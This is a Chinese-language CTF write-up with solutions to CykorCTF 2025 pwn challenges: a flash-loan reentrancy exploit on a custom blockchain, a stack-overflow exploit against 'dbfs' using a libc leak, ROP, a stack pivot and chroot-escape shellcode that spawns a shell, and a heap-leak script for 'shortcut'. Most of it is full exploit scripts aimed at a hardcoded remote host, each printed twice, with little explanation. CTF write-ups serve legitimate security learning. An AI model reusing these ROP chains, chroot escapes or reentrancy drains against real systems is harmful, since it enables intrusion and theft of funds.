#CykorCTF2025 Pwn 部分题解#gram内置的闪电贷合约有逻辑漏洞…
pub fn flash_loan(amount: u64, callback: address) {
...
storage.current_loan = amount;
transfer(callback, amount);
...
sync_call(callback, "on_flash_loan", amount, repay_amount);
let remaining: u64 = storage.current_loan;
require(remaining == 0, "flash loan not repaid");
}
pub fn repay() {
let received: u64 = msg.value;
let loan: u64 = storage.current_loan;
let fee: u64 = loan * fee_pct / 100;
let required: u64 = loan + fee;
require(received >= required, "insufficient repayment");
storage.current_loan = 0;
}
pub fn flash_loan(amount: u64, callback: address) {
...
storage.current_loan = amount;
transfer(callback, amount);
...
sync_call(callback, "on_flash_loan", amount, repay_amount);
let remaining: u64 = storage.current_loan;
require(remaining == 0, "flash loan not repaid");
}
pub fn repay() {
let received: u64 = msg.value;
let loan: u64 = storage.current_loan;
let fee: u64 = loan * fee_pct / 100;
let required: u64 = loan + fee;
require(received >= required, "insufficient repayment");
storage.current_loan = 0;
}
算是签到题了,像我这种区块链萌新都会做
from pwn import *
import re, hashlib, itertools
HOST = "43.203.37.155"
PORT = 58172
def leading_zero_bits(h: bytes) -> int:
for i, b in enumerate(h):
if b == 0:
continue
return i*8 + (8 - b.bit_length())
return len(h) * 8
def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
prev = bytes.fromhex(prev_hex)
miner = bytes.fromhex(miner_hex[2:])
for n in itertools.count():
h = hashlib.sha256(prev + miner + n.to_bytes(8, "little")).digest()
if leading_zero_bits(h) >= diff:
return n
def recv_prompt(r):
return r.recvuntil(b"> ")
def parse_banner(txt: str):
acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
return acc, pool, flag
def parse_work(txt: str):
prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
return prev, miner, diff
def main():
r = remote(HOST, PORT)
banner = recv_prompt(r).decode()
acc, pool, flag = parse_banner(banner)
log.info(f"acc={acc}, pool={pool}, flag={flag}")
balance = 0
while balance < 3:
r.sendline(b"getwork")
txt = r.recvuntil(b"Submit with: submit <nonce>\n")
txt += recv_prompt(r)
prev, miner, diff = parse_work(txt.decode())
nonce = solve_pow(prev, miner, diff)
log.info(f"found nonce {nonce} for diff {diff}")
r.sendline(f"submit {nonce}".encode())
out = recv_prompt(r).decode()
m = re.search(r"Balance:\s+(\d+) tokens", out)
if m:
balance = int(m.group(1))
log.info(f"balance now {balance}")
attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""
r.sendline(b"code")
r.recvuntil(b"Enter contract code")
for line in attack_code.splitlines():
r.sendline(line.encode())
deploy_out = recv_prompt(r).decode()
m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
attack_addr = m.group(1)
log.info(f"attack deployed at {attack_addr}")
r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
recv_prompt(r)
r.sendline(b"balance")
bal_out = recv_prompt(r).decode()
log.info("balance output:\n" + bal_out)
r.sendline(f"call {flag} claim_flag".encode())
final_out = recv_prompt(r).decode(errors="ignore")
print(final_out)
r.sendline(b"exit")
r.close()
if __name__ == "__main__":
main()
from pwn import *
import re, hashlib, itertools
HOST = "43.203.37.155"
PORT = 58172
def leading_zero_bits(h: bytes) -> int:
for i, b in enumerate(h):
if b == 0:
continue
return i*8 + (8 - b.bit_length())
return len(h) * 8
def solve_pow(prev_hex: str, miner_hex: str, diff: int) -> int:
prev = bytes.fromhex(prev_hex)
miner = bytes.fromhex(miner_hex[2:])
for n in itertools.count():
h = hashlib.sha256(prev + miner + n.to_bytes(8, "little")).digest()
if leading_zero_bits(h) >= diff:
return n
def recv_prompt(r):
return r.recvuntil(b"> ")
def parse_banner(txt: str):
acc = re.search(r"Account:\s+(0x[0-9a-f]+)", txt).group(1)
pool = re.search(r"Pool:\s+(0x[0-9a-f]+)", txt).group(1)
flag = re.search(r"Flag:\s+(0x[0-9a-f]+)", txt).group(1)
return acc, pool, flag
def parse_work(txt: str):
prev = re.search(r"Previous hash:\s+([0-9a-f]+)", txt).group(1)
miner = re.search(r"Miner:\s+(0x[0-9a-f]+)", txt).group(1)
diff = int(re.search(r"Difficulty:\s+(\d+) leading zero bits", txt).group(1))
return prev, miner, diff
def main():
r = remote(HOST, PORT)
banner = recv_prompt(r).decode()
acc, pool, flag = parse_banner(banner)
log.info(f"acc={acc}, pool={pool}, flag={flag}")
balance = 0
while balance < 3:
r.sendline(b"getwork")
txt = r.recvuntil(b"Submit with: submit <nonce>\n")
txt += recv_prompt(r)
prev, miner, diff = parse_work(txt.decode())
nonce = solve_pow(prev, miner, diff)
log.info(f"found nonce {nonce} for diff {diff}")
r.sendline(f"submit {nonce}".encode())
out = recv_prompt(r).decode()
m = re.search(r"Balance:\s+(\d+) tokens", out)
if m:
balance = int(m.group(1))
log.info(f"balance now {balance}")
attack_code = f"""contract Attack {{
storage {{ owner: address, pool: address }}
pub fn init() {{
storage.owner = msg.sender;
storage.pool = {pool};
}}
pub fn on_flash_loan(amount: u64, repay_amount: u64) {{
let p: address = storage.pool;
if amount > 1 {{
sync_call(p, "flash_loan", 1, self.address); // 覆盖 current_loan 再清零
transfer(storage.owner, amount); // 偷走外层贷款
}} else {{
sync_call_with_value(p, "repay", repay_amount); // 偿还内层
}}
}}
}}
EOF
"""
r.sendline(b"code")
r.recvuntil(b"Enter contract code")
for line in attack_code.splitlines():
r.sendline(line.encode())
deploy_out = recv_prompt(r).decode()
m = re.search(r"Deployed:\s+(0x[0-9a-f]+)", deploy_out)
attack_addr = m.group(1)
log.info(f"attack deployed at {attack_addr}")
r.sendline(f"call {pool} flash_loan 49999 {attack_addr}".encode())
recv_prompt(r)
r.sendline(b"balance")
bal_out = recv_prompt(r).decode()
log.info("balance output:\n" + bal_out)
r.sendline(f"call {flag} claim_flag".encode())
final_out = recv_prompt(r).decode(errors="ignore")
print(final_out)
r.sendline(b"exit")
r.close()
if __name__ == "__main__":
main()
#dbfs出题人给了源码,实现了一个简单的文件系统:
SET <name> <type> [value]: 创建键或目录GET <name>: 获取键值或列出目录内容DELETE <name>: 删除键或目录INFO <name>: 显示键或目录的详细信息CHDIR <name>: 切换当前目录在 handler_info 函数里,下面这段代码存在栈溢出漏洞:
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
getcwd(full_path, sizeof(full_path));
strcat(full_path, "/");
strcat(full_path, name);
strcat 没有做长度检查。但是问题是 strcat 默认会用 \x00 结尾,导致无法利用下面的 printf 泄漏地址,所以尝试找别的洞。

审计了一会发现 hex2bytes 函数里,如果输入非法的 hex 这里解析会失败,导致堆块里残留的地址不会被覆盖掉,所以风水一下搞个 libc 地址就可以了。
然后在打 rop 的时候会发现 payload 里不能出现 \x00,不然会截断导致报错。写个栈迁移到堆上即可。
后续打 orw,但是题目执行前 chroot 了,得先逃逸。

程序 chroot 到 /tmp 了,所以 open 失败,ls 只能看到 . 和 ..
完整 exp 如下:
# code by littflower.
from pwn import *
from sys import argv
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("43.203.37.155", 22222) if argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")
if args.G:
gdb.attach(io)
def cmd(c):
io.sendlineafter(b"dbfs> ", c)
dir_name = b"A" * 255
deep_levels = 18
victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall
mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process
xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50
escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop
mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall
xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall
exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""
orw = asm(escape_shellcode)
for i in range(deep_levels):
suffix = ("%02d" % i).encode()
name = dir_name[:-len(suffix)] + suffix
cmd(b"SET " + name + b" set")
cmd(b"CHDIR " + name)
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")
reread = asm(shellcraft.read(0, "rsp", 0x300))
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
cmd(b"INFO " + victimB)
pause()
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
# code by littflower.
from pwn import *
from sys import argv
proc = "./client"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
io = remote("43.203.37.155", 22222) if argv[1] == 'r' else process(proc)
libc = ELF("./libc.so.6")
if args.G:
gdb.attach(io)
def cmd(c):
io.sendlineafter(b"dbfs> ", c)
dir_name = b"A" * 255
deep_levels = 18
victimA = b"x" * 0xd0
cmd(f"SET {victimA} bytes ".encode() + b"A" * 0x400)
cmd(b"SET barrier bytes " + b"Z" * 0x100)
cmd(b"GET barrier")
io.recvuntil(b"Value (hex): ")
libc.address = u64(bytes.fromhex(io.recv(16).decode())) - 0x203f70
io.recv(16)
heap_base = u64(bytes.fromhex(io.recv(16).decode()))
log.info(f"libc.address => {hex(libc.address)}\nheap_addr => {hex(heap_base)}")
pop_rdi_ret = libc.address + 0x000000000010f78b
pop_rsi_ret = libc.address + 0x0000000000110a7d
pop_rax_ret = libc.address + 0x00000000000dd237
pop_rdx_ret = libc.address + 0x00000000000ab8a1
pop_rcx_ret = libc.address + 0x00000000000a877e
call_rax = libc.address + 0x000000000002a1c8
mprotect = libc.sym['mprotect']
ret = pop_rdi_ret + 1
rop = flat([pop_rdi_ret, (heap_base) & 0xfffffffffffff000, pop_rsi_ret, 0x3000, pop_rcx_ret, heap_base, pop_rdx_ret, 7, mprotect, pop_rax_ret, heap_base + 0x1498, call_rax])
escape_shellcode = f"""
_start:
xor rax, rax
push rax
mov rax, 0x637365
push rax
mov rdi, rsp
mov rsi, 0x1ed
mov rax, 83
syscall
mov rdi, rsp
mov rax, 161
syscall
test rax, rax
js exit_process
xor rax, rax
mov ax, 0x2e2e
push rax
mov rbx, 50
escape_loop:
mov rdi, rsp
mov rax, 80
syscall
dec rbx
jnz escape_loop
mov word ptr [rsp], 0x2e
mov rdi, rsp
mov rax, 161
syscall
xor rdx, rdx
xor rsi, rsi
mov rax, 0x68732f6e69622f
push rax
mov rdi, rsp
mov rax, 59
syscall
exit_process:
mov rax, 60
xor rdi, rdi
syscall
"""
orw = asm(escape_shellcode)
for i in range(deep_levels):
suffix = ("%02d" % i).encode()
name = dir_name[:-len(suffix)] + suffix
cmd(b"SET " + name + b" set")
cmd(b"CHDIR " + name)
victimB = b"V" * 0xbf + p64(heap_base + 0x1430)[:-2]
log.info(f"mprotect => {hex(mprotect)}")
reread = asm(shellcraft.read(0, "rsp", 0x300))
cmd(b"SET " + victimB + " bytes ".encode() + b"K" * 8 + rop + reread.ljust(0x100, b"A"))
pause()
cmd(b"INFO " + victimB)
pause()
io.sendline(b"\x90" * 0x20 + orw)
io.interactive()
#shortcut牢了最久的题。。
add delete run 时进行 overlap 检查add 最多 8 个,大小固定 0x20,不限机会,但 run 之后不可用,必须先 reloaddelete 功能释放所有堆块,最后一个槽位指针不置 0,两次机会run 可以显示堆块内容并释放 img chunk,两次机会reload 分配 img chunk,两次机会rename 分配 0x30,并可控 0x10,一次机会然后我写了一个泄漏 libc 和 heap base 的 exp 如下:
#!/usr/bin/env python3
from pwn import *
from sys import argv
import binascii
import struct
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)
if args.G:
gdb.attach(io, """
breakrva 0x244a
""")
def build_png():
sig = b"\x89PNG\r\n\x1a\n"
ihdr_data = p32(1, endian="big") + p32(1, endian="big") + b"\x08\x02\x00\x00\x00" # 1x1 RGB
ihdr_body = b"IHDR" + ihdr_data
ihdr = p32(len(ihdr_data), endian="big") + ihdr_body + p32(binascii.crc32(ihdr_body), endian="big")
iend_body = b"IEND"
iend = p32(0, endian="big") + iend_body + p32(binascii.crc32(iend_body), endian="big")
png = sig + ihdr + iend
return png.ljust(2016, b"A")
def choose(idx):
io.sendlineafter(b"> ", str(idx).encode())
def add(idx, buf):
choose(1)
io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)
def delete():
choose(2)
def run(size, buf):
choose(3)
io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
if size:
io.sendafter(b'send 32 bytes for watermark\n', buf)
def reload():
choose(4)
# io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
io.send(build_png())
def rename():
choose(5)
def name(buf):
io.recvuntil(b"What is your name?\n")
io.sendline(buf)
io.recvuntil(b": ")
leak = int(io.recvuntil(b"\n", drop=True).decode(), 16)
return leak
def leak():
io.recvuntil(b"fiLT\x80")
return u64(io.recv(8))
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
io.send(build_png())
for i in range(8):
add(i, b"A"*16)
delete()
run(0, b"")
heap_base = leak() << 12
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")
reload()
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()
#!/usr/bin/env python3
from pwn import *
from sys import argv
import binascii
import struct
proc = "./shortcut_patched"
context.log_level = "debug"
context.binary = proc
elf = ELF(proc, checksec=False)
libc = ELF("./libc.so.6", checksec=False)
io = remote("", ) if len(argv) > 1 and argv[1] == 'r' else process(proc)
if args.G:
gdb.attach(io, """
breakrva 0x244a
""")
def build_png():
sig = b"\x89PNG\r\n\x1a\n"
ihdr_data = p32(1, endian="big") + p32(1, endian="big") + b"\x08\x02\x00\x00\x00" # 1x1 RGB
ihdr_body = b"IHDR" + ihdr_data
ihdr = p32(len(ihdr_data), endian="big") + ihdr_body + p32(binascii.crc32(ihdr_body), endian="big")
iend_body = b"IEND"
iend = p32(0, endian="big") + iend_body + p32(binascii.crc32(iend_body), endian="big")
png = sig + ihdr + iend
return png.ljust(2016, b"A")
def choose(idx):
io.sendlineafter(b"> ", str(idx).encode())
def add(idx, buf):
choose(1)
io.sendlineafter(b'slot index (0~7)? ', str(idx).encode())
io.sendafter(f'send exactly 16 bytes for filter[{idx}]\n'.encode(), buf)
def delete():
choose(2)
def run(size, buf):
choose(3)
io.sendlineafter(b'watermark length (0~32)? ', str(size).encode())
if size:
io.sendafter(b'send 32 bytes for watermark\n', buf)
def reload():
choose(4)
# io.send(b"\x89\x50\x4e\x47\x0d\x0a\x1a\x0a" + cyclic(2016 - 8, n=8))
io.send(build_png())
def rename():
choose(5)
def name(buf):
io.recvuntil(b"What is your name?\n")
io.sendline(buf)
io.recvuntil(b": ")
leak = int(io.recvuntil(b"\n", drop=True).decode(), 16)
return leak
def leak():
io.recvuntil(b"fiLT\x80")
return u64(io.recv(8))
main_addr = name(b"aaa")
pie_addr = main_addr - 0x24f5
log.info(f"pie_addr => {hex(pie_addr)}")
io.send(build_png())
for i in range(8):
add(i, b"A"*16)
delete()
run(0, b"")
heap_base = leak() << 12
reload()
run(0, b"")
libc.address = leak() - 0x203b20
log.info(f"libc_addr => {hex(libc.address)}\nheap_base => {hex(heap_base)}")
reload()
# delete()
# rename()
# for i in range(6):
# add(i, b"A" * 16)
io.interactive()
还有一次 delete 和一次 reload 的机会
这里可以做一个 chunk 同时在 tcache 和 smallbin,然后打 tsu+ 即可。
#AKVC= =